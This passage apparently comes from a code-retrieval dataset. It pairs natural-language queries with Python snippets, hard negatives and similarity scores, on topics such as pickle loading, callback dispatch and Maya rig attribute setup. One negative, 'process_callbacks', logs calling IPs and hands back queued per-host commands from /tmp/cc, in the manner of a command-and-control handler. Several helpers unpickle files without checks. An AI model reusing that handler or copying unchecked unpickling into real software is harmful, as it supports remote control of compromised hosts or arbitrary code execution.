loadPickle(filepath):\n\tf = open(filepath, 'rb')\n\tobj = pickle.load(f)\n\tf.close()\n\treturn obj", "def load_groups(filename):\r\n with open(filename, 'rb') as f:\r\n saved_data = pickle.load(f)\r\n return saved_data", "def load_object(filename):\r\n with open(filename, 'rb') as input:\r\n obj = pickle.load(input)\r\n return obj", "def load_mapping(filename):\n with open(filename + '.pkl', 'rb') as handle:\n return pickle.load(handle)", "def pickle(self,data,filename):\n pickle.dump(data, open(filename, 'wb'))", "def load(self, filename):\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n # Set biases and weights\n self.W_input_to_hidden = data['wi']\n self.W_hidden_to_hidden = data['wh']\n self.W_hidden_to_output = data['wo']", "def load_pickle(filepath):\n logging.info('Loading object from pickle: {}'.format(filepath))\n with open(filepath, 'rb') as infile:\n return pickle.load(infile)", "def read_pickle(path):\n with open(path, \"rb\") as f:\n data = pickle.load(f)\n\n return data", "def load_pickle(path):\n with open(path, 'rb') as f:\n pickle_file = pickle.load(f)\n file_name = re.findall(r\"/?[^/]+\", path)[-1].strip(\"/\")\n print(f\"Loaded {file_name}.\")\n return pickle_file", "def pickle_load(file_path):\n if not os.path.isfile(file_path):\n return None\n\n with open(file_path, 'rb') as f:\n return pickle.load(f)", "def load_data_set_from_pickle(file_name=None):\n if not file_name:\n try:\n file_name = max(glob.glob(os.path.join(__pickled_data_directory__, '*.chars74k-lite.gz')), key=os.path.getctime)\n except ValueError as e:\n log.error('Unable to load data set from file since no pickled files could be found, ')\n return None\n\n log.debug('Loading data set from file: %s' % file_name)\n return unpickle_data(file_name)", "def load_data(\n self, file_path: str = os.path.join(os.getcwd(), \"data_breast_cancer.p\")\n ) -> None:\n with open(file_path, \"rb\") as file:\n data = pickle.load(file)\n self.x_train, self.y_train = data[\"x_train\"], data[\"y_train\"]\n self.x_test, self.y_test = data[\"x_test\"], data[\"y_test\"]", "def open_pickle_file(file_name):\n print(\"Unpickling file \" + file_name)\n full_file_name = full_path(file_name)\n with open(full_file_name, mode='rb') as f:\n return pickle.load(f)", "def load_data_pickle(self, load_full=False):\n self.train = pd.read_pickle('../input/train_mod.pkl')\n self.test = pd.read_pickle('../input/test_mod.pkl')\n if load_full:\n self.train_full = pd.read_pickle('../input/train_full_mod.pkl')", "def load_dictionary(filename):\n filename = os.path.join(FILE_DIR, 'assets/obj/' + filename)\n try:\n with open(filename, 'rb') as input:\n return pickle.load(input)\n except Exception as e:\n print(\"exception\", e)", "def pickleload(path):\n with open(path, 'rb') as file:\n loaded = pickle.load(file)\n return loaded" ]
[ "0.7869546", "0.7829951", "0.7812556", "0.77086544", "0.76826143", "0.7677001", "0.76607376", "0.7654821", "0.7640084", "0.7521244", "0.75156707", "0.7463171", "0.7457279", "0.743854", "0.7430627", "0.7389005", "0.7344408", "0.73272413", "0.7275342", "0.72668594", "0.7232986", "0.7232883", "0.7228265", "0.72269726", "0.72066486", "0.71936893", "0.71740854", "0.71422744", "0.7137935", "0.71364707", "0.7132823", "0.7108738", "0.7108738", "0.7079098", "0.7074106", "0.7035405", "0.70230824", "0.7009045", "0.6985634", "0.69816726", "0.6972461", "0.69690603", "0.69661814", "0.6965648", "0.6958563", "0.69576585", "0.6945246", "0.69389296", "0.69364303", "0.6932124", "0.6924645", "0.6923586", "0.69224226", "0.69188523", "0.6916983", "0.6916983", "0.6909045", "0.6907214", "0.68619585", "0.6843989", "0.6836591", "0.68264335", "0.681761", "0.68156236", "0.6798232", "0.67977726", "0.6795571", "0.6795194", "0.6789722", "0.67873406", "0.6780652", "0.67763317", "0.67752737", "0.6755705", "0.67475593", "0.67463636", "0.6740027", "0.67399514", "0.6734372", "0.6731503", "0.6727815", "0.6709846", "0.6706473", "0.67027295", "0.66999316", "0.66965574", "0.6692341", "0.66900307", "0.66849905", "0.6684788", "0.6682241", "0.66821694", "0.66701895", "0.6665038", "0.66571206", "0.66533077", "0.6647079", "0.6640107", "0.6636412", "0.6636155" ]
0.68825763
58
Sends args and kwargs to any configured callbacks. This handles the cases where the 'callbacks' variable is ``None``, a single function, or a list.
def _multiple_callbacks(callbacks, *args, **kwargs): if isinstance(callbacks, list): for cb in callbacks: cb(*args, **kwargs) return if callbacks: callbacks(*args, **kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run_callbacks(self, **kwargs):\n for callback in self.CALLBACKS:\n getattr(self, callback)(**kwargs)", "def callbacks(*args, addCallback: Script=None, clearAllCallbacks: bool=True, clearCallbacks:\n bool=True, describeHooks: bool=True, dumpCallbacks: bool=True, executeCallbacks:\n bool=True, hook: AnyStr=\"\", listCallbacks: bool=True, owner: AnyStr=\"\",\n removeCallback: Script=None, **kwargs)->List[AnyStr]:\n pass", "def __call__(self, args, kwargs):\n callback = self._callback_ref()\n if callback is not None:\n callback(*args, **kwargs)", "def subscribe_callbacks(self, *args):\n for arg in args:\n self.callbacks.append(arg)", "def trigger(self, callback_type, *args):\n if self.callbacks.has_key(callback_type):\n for cb in self.callbacks[callback_type]:\n cb(*args)", "def callback(self, *args, **kwargs):\n\n for key, (methodwrapper, onetime) in list(self.callbacks.items()):\n try:\n methodwrapper(*args, **kwargs)\n except:\n log.err()\n\n if onetime:\n del self.callbacks[key]", "def callback(self, fun: Callable[[], None] | None) -> None:", "def _forward_cb(self, *args, **kwargs):\n for callback_function in self.changeCallbacks:\n callback_function(*args, **kwargs)", "def _run_callbacks(cls, cb_method, *args):\n global CALLBACKS\n for c in CALLBACKS:\n attr = getattr(c, cb_method)\n attr(*args)", "def execute_callbacks(self, name, *args, **kwargs):\n callbacks = self.callbacks.get(name, {}).items()\n for order, func in callbacks:\n func(self, *args, **kwargs)\n\n return len(callbacks)", "def handle_admincallbacks(bot, ievent):\n cbs = getcallbacktable()\n if not ievent.rest: ievent.reply(\"callbacks: \", cbs)\n else:\n try: ievent.reply(\"%s callbacks: \" % ievent.rest, cbs[ievent.rest])\n except KeyError: ievent.reply(\"no such callbacks available\")", "def get_callbacks(callbacks: List[str]) -> List:\n callback_functions = []\n for callback in callbacks:\n try:\n callback_functions.append(eval(callback))\n except (NameError, AttributeError) as err:\n sys.exit(f'{err}. Accepted callbacks from {tf}, {sm}, {tfa}')\n return callback_functions", "def set_callbacks(self, **dic_functions):\n for action in self.interface.CALLBACKS:\n try:\n f = dic_functions[action]\n except KeyError:\n pass\n else:\n setattr(self.interface.callbacks, action, f)\n manquantes = [\n a for a in self.interface.CALLBACKS if not a in dic_functions]\n if not manquantes:\n logging.debug(\n f\"{self.__class__.__name__} : Tous les callbacks demandés sont fournis.\")\n else:\n logging.warning(\n f\"{self.__class__.__name__} didn't set asked callbacks {manquantes}\")", "def dispatch_callback(self, callback):\n self.callback_queue.put(lambda: callback.func(*callback.args))", "def _trigger_callback(self, *args, **kwargs):\n for callback_function in self.changeCallbacks:\n callback_function(self, *args, **kwargs)", "def execute(self):\n args = self.args\n \n for callNumber in xrange(len(self.callback)):\n args = (self.callback.pop(0))(*args)\n \n if not (isinstance(args,tuple) or isinstance(args,list)):\n args = [args]\n \n return args", "def initialise_callbacks():\n adapter = mice.ice.createObjectAdapterWithEndpoints(\"Callback.Client\", \"tcp -h 127.0.0.1\")\n adapter.activate()\n cb=mice.Murmur.ServerCallbackPrx.uncheckedCast(adapter.addWithUUID(ServerCallbackI(s, adapter)))\n s.addCallback(cb)", "def handle_cb(self, obj, cb, kwargs):\n callbacks = kwargs.get(\"callbacks\", {})\n callback_exception_failure = kwargs.get(\"callback_exception_failure\", True)\n\n callback = callbacks.get(cb, None)\n if callback:\n m = \"Running callback function {f} for {n}\".format\n m = m(f=callback, n=cb)\n self.mylog.debug(m)\n try:\n obj = callback(handler=self, obj=obj, kwargs=kwargs)\n except Exception as e:\n if callback_exception_failure:\n raise\n else:\n m = \"Exception occurred in callback function {f} for {n}: {e}\".format\n m = m(f=callback, n=cb, e=e)\n self.mylog.exception(m)\n else:\n m = \"No callback function specified for {n}\".format\n m = m(n=cb)\n self.mylog.debug(m)\n return obj", "def perform_callback(self, *args, **kwargs):\n pass", "def execute(self):\n\t\tfor callback in self:\n\t\t\tcallback()", "def setEventCallbacks(self, callbacks):\n self.ws.setEventCallbacks(callbacks)", "def fit_callbacks():\n # pylint: disable=no-value-for-parameter\n return model_callbacks() + logging_callbacks()\n # pylint: enable=no-value-for-parameter", "def __init__(self, callback, *args, **kwargs):\n self.callback = lambda: callback(*args, **kwargs)", "def runCallback(self, callback=\"help\"):\n self.initialize()\n\n # run the start callback\n tools.run_callback(\"start\", {'request': self._request})\n\n config = self._request.getConfig()\n data = self._request.getData()\n\n # invoke all callbacks for the 'callback'\n handled = tools.run_callback(callback,\n {'request': self._request},\n mappingfunc=lambda x,y:x,\n donefunc=lambda x:x)\n\n # do end callback\n tools.run_callback(\"end\", {'request': request})", "def execute(self):\n results = []\n \n for callback in self.callback:\n results.append(callback(*self.args))\n \n return results", "def do_callback(self, sensor):\n if sensor in self._callbacks:\n for callback in self._callbacks[sensor]:\n try:\n callback(None)\n except Exception as e:\n self.stick.logger.error(\n \"Error while executing all callback : %s\",\n e,\n )", "def collecting_callback():\n calls = []\n\n def cb(**kwargs):\n calls.append(kwargs)\n\n return cb, calls", "def set_callbacks(self):\n\t\tself.set_floor_callbacks()\n\t\tself.set_button_callbacks()\n\t\tself.set_stop_callback()", "def on_post_execution(**kwargs):\n logging.debug(\"Calling callbacks: %s\", __post_exec_callbacks)\n for callback in __post_exec_callbacks:\n try:\n callback(**kwargs)\n except Exception:\n logging.exception(\"Failed on post-execution callback using %s\", callback)", "def on_pre_execution(**kwargs):\n logging.debug(\"Calling callbacks: %s\", __pre_exec_callbacks)\n for callback in __pre_exec_callbacks:\n try:\n callback(**kwargs)\n except Exception:\n logging.exception(\"Failed on pre-execution callback using %s\", callback)", "def setObjectCallbacks(self, callbacks):\n self.ws.setObjectCallbacks(callbacks)", "def fire_event(self, callback: Callable[..., bool], **kwargs):\n if not callable(callback):\n raise RuntimeError('Callback method (callback) is not a callable.')\n\n # get developer passed trigger_ids\n trigger_ids: list | None = kwargs.pop('trigger_ids', None)\n\n for trigger_id, config in list(self.configs.items()):\n if trigger_ids is not None and trigger_id not in trigger_ids:\n # skip config that don't match developer provided trigger ids\n continue\n\n try:\n # get a session_id specifically for this thread\n session_id: str = self.create_session_id()\n\n # only required for testing in tcex framework\n self._tcex_testing(session_id, trigger_id)\n\n # get an instance of PB module with current\n # session_id and outputs to pass to callback\n outputs: list | str = config.tc_playbook_out_variables or []\n if isinstance(outputs, str):\n outputs = outputs.split(',')\n playbook = self.get_playbook(context=session_id, output_variables=outputs)\n\n self.log.info(f'feature=trigger-service, event=fire-event, trigger-id={session_id}')\n\n # current thread has session_id as name\n self.service_thread(\n name=session_id,\n target=self.fire_event_trigger,\n args=(\n callback,\n playbook,\n session_id,\n trigger_id,\n config,\n ),\n kwargs=kwargs,\n session_id=session_id,\n trigger_id=trigger_id,\n )\n except Exception:\n self.log.trace(traceback.format_exc())", "def execute():\n command_line_args = argv[1:]\n args = cli(command_line_args)\n\n callback = args.callback\n kwargs = {\n k: v\n for k, v in args.__dict__.items()\n if k != \"callback\"\n }\n\n main(callback, **kwargs)", "def set_callback(self,callback = None):\n self.callback = callback", "def set_callback(self, callback_frames=None, callback_audio=None):\n if callback_frames is not None:\n if not callable(callback_frames):\n raise ValueError(\"`callback_frames` must be callable.\")\n self._callback_frames = callback_frames\n if callback_audio is not None:\n if not callable(callback_audio):\n raise ValueError(\"`callback_audio` must be callable.\")\n self._audio_player.set_callback(callback_audio)", "def call_on(self, target):\n for cb in self._callbacks:\n if hasattr(target, cb):\n c = getattr(target, cb)\n if callable(c):\n c()", "def _callback(self, *args):\n\n # Check to see if the first argument is a 'help' call\n if((args) and (args[0] in [\"help\",\"?\"])):\n self.console.writeln(self.help)\n else:\n self.callback(*args)", "def callback(self, callback, *args, **kwds):\n\n def _exit_wrapper(exc_type, exc, tb):\n callback(*args, **kwds)\n\n # We changed the signature, so using @wraps is not appropriate, but\n # setting __wrapped__ may still help with introspection\n _exit_wrapper.__wrapped__ = callback\n self.push(_exit_wrapper)\n return callback # Allow use as a decorator", "def register_callback(self, callback: Callable[[], None]) -> None:\r\n print(\"register callback called\")\r\n self._callbacks.add(callback)", "def dispatch_post_action_callbacks(atexit, s_db, s_cur, d_db, d_cur):\n if not atexit:\n pa = nori.core.cfg['post_action_callbacks']\n else:\n pa = post_action_callbacks\n num_cbs = len(pa)\n for i, cb_t in enumerate(pa):\n cb, args, kwargs = cb_t[0:3] # there might be a 4th\n nori.core.status_logger.info(\n 'Calling post-action callback {0} of {1}...' .\n format((i + 1), num_cbs)\n )\n ret = cb(*args, s_db=s_db, s_cur=s_cur, d_db=d_db, d_cur=d_cur,\n **kwargs)\n nori.core.status_logger.info(\n 'Callback complete.' if ret else 'Callback failed.'\n )\n if (not atexit) and ((cb, args, kwargs) in post_action_callbacks):\n post_action_callbacks.remove((cb, args, kwargs))", "def create_callback(self, chain):", "def add_callbacks(self, defaults):\n defaults.update(self.mouse_callbacks)\n self.mouse_callbacks = defaults", "def _set_callback(self):\n self.callback_f = None\n if self.callback:\n self.callback_f = inspector_mtw(**self.callback_kwargs)", "def get_callback_list(hyperparams: Dict[str, Any]) -> List[BaseCallback]:\n\n def get_module_name(callback_name):\n return \".\".join(callback_name.split(\".\")[:-1])\n\n def get_class_name(callback_name):\n return callback_name.split(\".\")[-1]\n\n callbacks = []\n\n if \"callback\" in hyperparams.keys():\n callback_name = hyperparams.get(\"callback\")\n\n if callback_name is None:\n return callbacks\n\n if not isinstance(callback_name, list):\n callback_names = [callback_name]\n else:\n callback_names = callback_name\n\n # Handle multiple wrappers\n for callback_name in callback_names:\n # Handle keyword arguments\n if isinstance(callback_name, dict):\n assert len(callback_name) == 1, (\n \"You have an error in the formatting \"\n f\"of your YAML file near {callback_name}. \"\n \"You should check the indentation.\"\n )\n callback_dict = callback_name\n callback_name = list(callback_dict.keys())[0]\n kwargs = callback_dict[callback_name]\n else:\n kwargs = {}\n callback_module = importlib.import_module(get_module_name(callback_name))\n callback_class = getattr(callback_module, get_class_name(callback_name))\n callbacks.append(callback_class(**kwargs))\n\n return callbacks", "def execute_callbacks(query, result):\n for func in self.callbacks:\n func(query, result)", "def Invoke (self, owner: typing.Any, eventArguments: typing.Optional[EventArguments]) -> None:\n\n\t\tif not isinstance(eventArguments, EventArguments) and eventArguments is not None:\n\t\t\traise Exceptions.IncorrectTypeException(eventArguments, \"eventArguments\", (EventArguments, None))\n\n\t\tfor callback in self: # type: typing.Callable\n\t\t\tcallback(owner, eventArguments)", "def callback(self, function: Optional[Callable[[int], None]]) -> None:", "def bind(self, event_type, callback):\n\n # Each event type has a list of callback functions to be called.\n # If we have not seen the event type yet, then create an empty list,\n # otherwise append to the existing list:\n self.callbacks.setdefault(event_type, []).append(callback)", "def forward_callbacks(self, obj):\n obj.add_change_callback(self._forward_cb)", "def execute(self):\n results = []\n\n for callNumber in xrange(len(self.callback)):\n results.append( (self.callback.pop(0))(*self.args.pop(0)) )\n\n return results", "def set_asyncgen_hooks(*args, **kwargs): # real signature unknown; NOTE: unreliably restored from __doc__\n pass", "def callback(cb): \n def cb_func(*args):\n self = args[0]\n (value, is_last) = cb(*args)\n if (value is not None):\n self._cb_return[cb.__name__] = self._cb_return.get(cb.__name__, []) + \\\n [value]\n if (is_last):\n self._cb_event[cb.__name__] = True\n return cb_func", "def addCallback(self,newCallback,*newArgs):\n self.callback.append(newCallback)\n self.args.append(newArgs)", "def apply_callback(self, all_values: Namespace) -> Any:\n if not callable(self.callback):\n return self.value\n\n try:\n val = self.callback(self.value, all_values)\n except TypeError as terr: # pragma: no cover\n # len() takes exactly one argument (2 given)\n # <lambda>() takes 1 positional argument but 2 were given\n if not re.search(r\"takes .+ argument .+ given\", str(terr)):\n raise\n val = self.callback(self.value)\n\n if isinstance(val, Exception):\n raise PyParamTypeError(str(val))\n return val", "def _notify_callback_event(self, event, data):\n # Notify callbacks\n for cback in self.callbacks:\n cback.invoke(self, event, data)", "def connect(\n cls,\n on_start=None,\n on_resume=None,\n on_pause=None,\n on_stop=None,\n on_save=None,\n on_reset=None,\n ):\n if on_start and on_start not in cls.start_callback:\n cls.start_callback.append(on_start)\n\n if on_resume and on_resume not in cls.resume_callback:\n cls.resume_callback.append(on_resume)\n\n if on_pause and on_pause not in cls.pause_callback:\n cls.pause_callback.append(on_pause)\n\n if on_stop and on_stop not in cls.stop_callback:\n cls.stop_callback.append(on_stop)\n\n if on_save and on_save not in cls.save_callback:\n cls.save_callback.append(on_save)\n\n if on_reset and on_reset not in cls.reset_callback:\n cls.reset_callback.append(on_reset)", "def callback_method(value):\n assert value == 'With callback'", "def callback(self, *args):\n raise NotImplementedError()", "def dummy_callback(obj):\n pass", "def set_stream_callbacks(self):\n from telnetlib3.telopt import TTYPE, TSPEED, XDISPLOC, NEW_ENVIRON\n from telnetlib3.telopt import CHARSET, NAWS\n\n # wire extended rfc callbacks for terminal atributes, etc.\n for (opt, func) in (\n (TTYPE, self.send_ttype),\n (TSPEED, self.send_tspeed),\n (XDISPLOC, self.send_xdisploc),\n (NEW_ENVIRON, self.send_env),\n (NAWS, self.send_naws),\n (CHARSET, self.send_charset),\n ):\n self.stream.set_ext_send_callback(opt, func)", "def restipy(callback,\n pre_call=lambda env,sr,args,kwargs: None,\n post_call=lambda env,sr,call_ret: None):\n _func_table[callback.__name__] = (callback, pre_call, post_call)", "def register(self, callback, filters = []):\n\t\tself.callbacks.append((callback, filters))\n\t\tself.events[str(callback)] = []", "def set_callback(self, callback):\n if not callable(callback):\n raise TypeError(\"'callback' must be callable\")\n\n self._callback = callback", "def call_start_cbs(self):\n try:\n for (cb,args) in self._start_cbs:\n cb(self.userdata, self.get_initial_states(), *args)\n except:\n smach.logerr(\"Could not execute start callback: \"+traceback.format_exc())", "def __trigger(self, toBeExecuted, args = []):\n\n self.__connect()\n [ f(args) for f in toBeExecuted ]\n self.__disconnect()", "def subscribe(self, callback: Callable) -> None:\n self.callbacks.add(callback)", "def add_callback(self, done_cb: Callable[[], None] = None) -> None:\n\n if done_cb is not None:\n self.callbacks.append(done_cb)", "def callbacks(self, val_generator: DataGenerator) -> List[Callback]:\n if self.train_mode in [\"classifier\", \"both\"]:\n model = self.classifier\n model_dir = \"class_model\"\n elif self.train_mode == \"combined\":\n model = self.combined\n model_dir = \"com_model\"\n\n # Callback for evaluating the validation dataset\n eval_callback = EvalCallback(\n model=model, val_generator=val_generator, layers=self.n_blocks\n )\n\n # callback for saving the best model\n checkpoint_callback = ModelCheckpoint(\n f\"{model_dir}/{model_dir}\" + \"_{epoch:04d}_{val_acc:.4f}.h5\",\n monitor=\"val_acc\",\n verbose=0,\n save_best_only=True,\n save_weights_only=False,\n mode=\"max\",\n )\n\n \"Make sure checkpoint callback is after the eval_callback, dependency\"\n return [eval_callback, checkpoint_callback]", "def add_callback(self, callback):\n if callback is not None:\n self.callbacks.append(callback)", "def subscribe(callback, keys):\n assert type(keys) in (set, list, tuple)\n _subscribers[callback] = keys", "def append(self, callback):\n\t\tif callback is None:\n\t\t\tpass\n\t\telif callable(callback):\n\t\t\tlist.append(self, WeakMethod(callback))\n\t\telif isinstance(callback, list, tuple):\n\t\t\tfor i in callback:\n\t\t\t\tself.append(i)\n\t\telse:\n\t\t\tassert False", "def add(self, callback):\n self._callbacks += as_cb_list(callback)", "async def send(self, *args, **kwargs) -> None:\n for callback in self:\n res = callback(*args, **kwargs)\n if asyncio.iscoroutine(res) or isinstance(res, asyncio.Future):\n await res", "def run_callback(self, name, handle_exceptions=True, show_traceback=None,\n **kwargs):\n for fcn in self._cb_dict[name]:\n try:\n fcn(**kwargs)\n except Exception as ex:\n if handle_exceptions:\n self.logger.debug('Callback %s failed' % (name, ),\n exc_info=True)\n if show_traceback is not None:\n print('Callback %s failed' % (name, ))\n util.print_traceback(ex, f=show_traceback)\n\n else:\n raise", "def set_update_callbacks(self, update_tr_pos_callback, update_view_model_callback) -> None:\n\n self.update_tr_position = update_tr_pos_callback\n self.update_view_model = update_view_model_callback", "def _dummy_callback():\n assert False, \"TRESPASS - set_callback() must be called\"", "def set_request_handler(self, callback: Callable[[ACLMessage], Any]):\n self.callback = callback", "def add(self, callback, *args, **kwargs):\n\n self.list.append((callback, args, kwargs))", "def add_callbacks(am, ifttkey, ifttevent):\n if _debug:\n print(\"add_callbacks\", am)\n\n xurl = IFTT_URL.format(ifttevent, ifttkey)\n for c in am.mac_targets.values():\n call_val = {\n 'url': xurl,\n 'id': c.name,\n 'cur_val': -1\n }\n c.add_callback(iftt_callback, call_val)", "def on_events(self, insert_callback=None, set_callback=None,\n del_callback=None, reverse_callback=None, sort_callback=None):\n self.on_insert(insert_callback)\n self.on_set(set_callback)\n self.on_del(del_callback)\n self.on_reverse(reverse_callback)\n self.on_sort(sort_callback)", "def add_asyn_callback(self, fcn, **kwargs):\n assert(hasattr(fcn, '__call__'))\n self._asyn_callbacks[fcn] = kwargs", "def Callbacks (self) -> typing.List[typing.Callable]:\n\n\t\tcallbacks = list()\n\n\t\tcallbackReferenceIndex = 0\n\t\twhile callbackReferenceIndex < len(self._callbackReferences):\n\t\t\tcallback = self._callbackReferences[callbackReferenceIndex]()\n\n\t\t\tif callback is None:\n\t\t\t\tself._callbackReferences.pop(callbackReferenceIndex)\n\t\t\t\tcontinue\n\n\t\t\tcallbacks.append(callback)\n\t\t\tcallbackReferenceIndex += 1\n\n\t\treturn callbacks", "def register_callbacks(self, cbs):\n assert isinstance(cbs, dict) # cbs must be a dictionary\n cbs_key_list = list(cbs.keys())\n enum_key_list = [enum.value for enum in self._action_type_enum]\n \n # TODO replace by check for compulsory keys only, all action types do not apply to all actions\n #assert(len(set(enum_key_list) - set(cbs_key_list)) == 0)\n\n self._cbs = {}\n for key in cbs_key_list: # check syntax\n print \"Registered callback for action %s\" % key\n self._cbs[key] = cbs[key]\n rospy.logdebug(\"Callbacks registered.\")", "def prepare_callbacks(output_dir: str) -> Tuple[Callable]:\n time = datetime.now().strftime(\"%y%m%d-%H%M\")\n log_dir = os.path.join(output_dir, \"tensorboard\" + time)\n logging.info(\"Tensorboard directory: %s\" % log_dir)\n tensorboard = TensorBoard(log_dir=log_dir, batch_size=1000, write_images=True,\n write_graph=True)\n csv_path = os.path.join(output_dir, \"csv_logger_\" + time + \".txt\")\n logging.info(\"CSV logs: %s\" % csv_path)\n csv_logger = CSVLogger(csv_path)\n\n filepath = os.path.join(output_dir, \"best_\" + time + \".model\")\n model_saver = ModelCheckpoint(filepath, monitor=\"val_recall\", verbose=1, save_best_only=True,\n mode=\"max\")\n return tensorboard, csv_logger, model_saver", "def register_callbacks(self):\n self.either_edge_cb = self.pi.callback(\n self.gpio,\n pigpio.EITHER_EDGE,\n self.either_edge_callback\n )", "def runEventCallbacks(self, event, *args):\n\n if not event in self.EVENT_TYPES:\n raise Exception(\"XnatIo (onEvent): invalid event type '%s'\"%(\\\n event))\n if not hasattr(self, 'eventCallbacks__'):\n print('self has no attribute eventCallbacks__')\n return\n\n for callback in self.eventCallbacks__[event]:\n #print(f\"EVENT CALLBACK {event}\")\n callback(*args)", "def _setup_callbacks(lst, log_models, metrics_logger):\n # pylint: disable=no-name-in-module\n from mlflow.tensorflow._autolog import _TensorBoard, __MLflowTfKeras2Callback\n\n tb = _get_tensorboard_callback(lst)\n if tb is None:\n log_dir = _TensorBoardLogDir(location=tempfile.mkdtemp(), is_temp=True)\n\n out_list = lst + [_TensorBoard(log_dir.location)]\n else:\n log_dir = _TensorBoardLogDir(location=tb.log_dir, is_temp=False)\n out_list = lst\n out_list += [__MLflowTfKeras2Callback(log_models, metrics_logger, _LOG_EVERY_N_STEPS)]\n return out_list, log_dir", "def fire_event(self, event = None):\n for e in self.events:\n if e[\"event\"] == event:\n if type(e[\"args\"]) == type([]):\n e[\"callback\"](*e[\"args\"])\n elif type(e[\"args\"]) == type({}):\n e[\"callback\"](**e[\"args\"])\n elif e[\"args\"] == None:\n e[\"callback\"]()\n else:\n e[\"callback\"](e[\"args\"])\n return True", "def Handler(self, *events: str, colon: bool = False,\n ircv3: bool = False) -> Callable:\n ...", "def cbhandler(cls, session, cb_input):\n commandhandler = dict()\n commandhandler.update(dict({'sleep': cls.sleep}))\n commandhandler.update(dict({'dupsession': cls.reinitsession}))\n for i in range(len(cb_input)):\n command = cb_input[i]['cmd']\n arg = cb_input[i]['arg']\n if command in commandhandler.keys():\n cb_input[i]['ret'] = commandhandler[command](arg, session)\n else:\n print(\"Unknown command passed\", command)\n cls.log(3, \"Unknown command passed\", command)", "def on_recv(self, callback):\n if callback is None:\n self._on_recv = callback\n else:\n\n def wrap_recv(header, body):\n callback(body)\n\n self._on_recv = wrap_recv", "def async_callback(self, callback, *args, **kwargs):\n if callback is None:\n return None\n\n if args or kwargs:\n callback = functools.partial(callback, *args, **kwargs)\n\n def wrapper(*args, **kwargs):\n try:\n return callback(*args, **kwargs)\n except Exception, e:\n logging.error('Exception during callback', exc_info=True)\n\n return wrapper", "def call(manager, *args):\n for instance in manager:\n instance.callback(*args)", "def call_subscribers(self, *args, **kwargs) -> None:\n for subscriber in self.get_subscribers():\n subscriber(*args, **kwargs)", "def on_set(self, callback):\n self._set_callback = callback if callable(callback) else _void", "def on_set(self, callback):\n self._set_callback = callback if callable(callback) else _void", "def __call__(self, *args, **kwargs):\n value = None\n for callback in self.callbacks:\n try:\n local_value = callback(*args, **kwargs)\n except Exception as e:\n ip = get_ipython()\n if ip is None:\n self.log.warning(\"Exception in callback %s: %s\", callback, e, exc_info=True)\n else:\n ip.showtraceback()\n else:\n value = local_value if local_value is not None else value\n return value", "def process_callbacks(host, typ):\n \n ip = host.replace(\"-\", \".\")\n src = typ\n call_time = strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())\n\n if os.path.isfile(\"/tmp/cc/calls.log\"): # write callback to calls log\n with open(\"/tmp/cc/calls.log\", 'a') as f:\n s = \"{0:<25} {1:<16} {2:<10}\\n\".format(call_time, ip, src)\n f.write(s)\n else:\n with open(\"/tmp/cc/calls.log\", 'w') as f:\n s = \"{0:<25} {1:<16} {2:<10}\\n\".format(call_time, ip, src)\n f.write(s)\n\n com_file = \"/tmp/cc/hosts/\" + ip # read commands from the appropriate file\n if os.path.isfile(com_file):\n with open(com_file, 'r') as f:\n c = f.read()\n os.remove(com_file)\n return c + \"\\n\"\n else:\n return \"#lmao\\n\"", "def __call__(self, event_type, details):\n cb = self.callback\n if cb is None:\n return\n if self._details_filter is not None:\n if not self._details_filter(details):\n return\n kwargs = dict(self._kwargs)\n kwargs['details'] = details\n cb(event_type, *self._args, **kwargs)", "def setup_callbacks(self):\n\n super(ArtellaMayaPlugin, self).setup_callbacks()\n\n callbacks.register(callback.Callbacks().AfterOpenCallback, self._after_open)\n callbacks.register(callback.Callbacks().SceneBeforeSaveCallback, self._before_save)\n callbacks.register(callback.Callbacks().BeforeOpenCheckCallback, self._before_open_check)\n callbacks.register(callback.Callbacks().AfterLoadReferenceCallback, self._after_load_reference)\n callbacks.register(callback.Callbacks().BeforeCreateReferenceCheckCallback, self._before_reference_check)" ]
[ "0.702277", "0.66514504", "0.65428776", "0.651266", "0.6477689", "0.61787194", "0.6089447", "0.60846204", "0.60464215", "0.60348064", "0.59095436", "0.590122", "0.5900241", "0.5882658", "0.5858614", "0.5747529", "0.57051486", "0.5680165", "0.56781036", "0.5653725", "0.5636546", "0.5616152", "0.55880874", "0.55756146", "0.55564874", "0.5518041", "0.5517807", "0.5497091", "0.54964554", "0.5467474", "0.54554087", "0.54337764", "0.53963876", "0.5376686", "0.53637636", "0.53586507", "0.53429586", "0.5341724", "0.5330287", "0.53171694", "0.53044516", "0.5258516", "0.52428", "0.52409726", "0.52407306", "0.5232459", "0.5208991", "0.51972187", "0.5185989", "0.51786935", "0.5166441", "0.5166003", "0.51637214", "0.51533335", "0.51472944", "0.51440096", "0.5140474", "0.5125386", "0.5092434", "0.50855476", "0.50774086", "0.5075293", "0.506917", "0.5054927", "0.5029005", "0.5028113", "0.5025376", "0.5016435", "0.5013147", "0.5012792", "0.5011033", "0.5005025", "0.5000638", "0.49992755", "0.49989694", "0.49805203", "0.49717963", "0.49652502", "0.4951834", "0.49488762", "0.4946779", "0.4941704", "0.4939725", "0.49365917", "0.49338582", "0.49238867", "0.49184102", "0.49156764", "0.49146008", "0.49060258", "0.49052462", "0.4904084", "0.49033925", "0.4894868", "0.48883152", "0.48883152", "0.48833558", "0.48815137", "0.48797992", "0.48743755" ]
0.7574884
0
Adds and connects attributes from default encore FKIK switch anim setup to rig nodes in scene Imports default control setup from file or you may specify source_ctrl in args to override
def make_fkikSwitch_connection_attrs(partpre=None, side='Lt', source_ctrl=None, tag_name='switch', snapTo=None, add_attrs=None): switch_anim = '' if source_ctrl is not None: switch_anim = source_ctrl partpre = partpre if partpre == '': partpre = 'mypart_' if source_ctrl is None: # filepath = r'C:/Users/Nicob/Documents/maya/scripts/rigBot/rigBot/config/switcher_anim.mb' system_base_path = os.path.dirname(utils.__file__) base_path = os.path.join(system_base_path, 'config') file_path = os.path.join(base_path, 'switcher_anim.mb') newnodes = mc.file(filepath, i=1, ignoreVersion=1, rnn=1, mergeNamespacesOnClash=0, rpr=partpre, ra=1, options="v=0;", pr=1) switch_anim = partpre + '_CTL' # pos switcher grpOffset node if snapTo if snapTo is not None: utils.snap_to_transform(snapTo, switch_anim.replace('CTL', 'grpOffset')) mc.setAttr(switch_anim.replace('CTL', 'grpOffset') + '.r', 0, 0, 0) # get value of tags and sort into ik and fk vis groups iks = [] fks = [] nodes = mc.ls('*.' + tag_name) for node in nodes: if partpre in node and side in node: mode = 